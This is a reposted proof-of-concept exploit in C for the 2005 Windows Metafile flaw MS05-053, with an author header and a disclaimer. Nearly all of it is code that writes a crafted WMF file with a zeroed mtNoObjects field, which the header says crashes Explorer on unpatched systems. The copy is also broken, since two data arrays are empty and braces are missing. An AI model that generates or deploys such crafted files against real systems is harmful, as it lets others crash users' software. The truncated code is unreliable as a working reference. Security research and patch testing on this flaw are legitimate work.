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Microsoft Windows Metafile (WMF) mtNoObjects Header Remote Exploit (MS05-053)
来源:www.vfocus.net 作者:Winny 发布时间:2005-12-01  

Microsoft Windows Metafile (WMF) "mtNoObjects" Header Remote Exploit (MS05-053)

Note : Proof of concept exploit (DoS)

* Author: Winny Thomas
* Pune, INDIA
* The crafted metafile (WMF) from this code when viewed in explorer crashes it.
* The issue is seen when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed.
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.

#include <stdio.h>

unsigned char wmfheader[] =
"\x01\x00" //mtType
"\x09\x00" //mtHeaderSize
"\x00\x03" //mtVersion
"\xff\xff\xff\x7f" //mtSize
"\x00\x00" //mtNoObjects
"\xff\xff\xff\xff" //mtMaxRecord

unsigned char metafileRECORD[] =

unsigned char wmfeof[] =

int main(int argc, char *argv[])
FILE *fp;
int metafilesizeW, recordsizeW;
char wmfbuf[2048];
int metafilesize, recordsize, i, j;

metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3;
metafilesizeW = metafilesize/2;
recordsize = sizeof (metafileRECORD) -1;
recordsizeW = recordsize/2;

memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4);
memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4);

printf("[*] Adding Metafile header\n");
for (i = 0; i < sizeof(wmfheader) -1; i++) {
(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];

printf("[*] Adding metafile records\n");
for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) {
wmfbuf[j] = metafileRECORD[i];

printf("[*] Setting EOF\n");
for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
wmfbuf[j] = wmfeof[i];

printf("[*] Creating Metafile (MS053.wmf)\n");
fp = fopen("MS053.wmf", "wb");
fwrite(wmfbuf, 1, metafilesize, fp);

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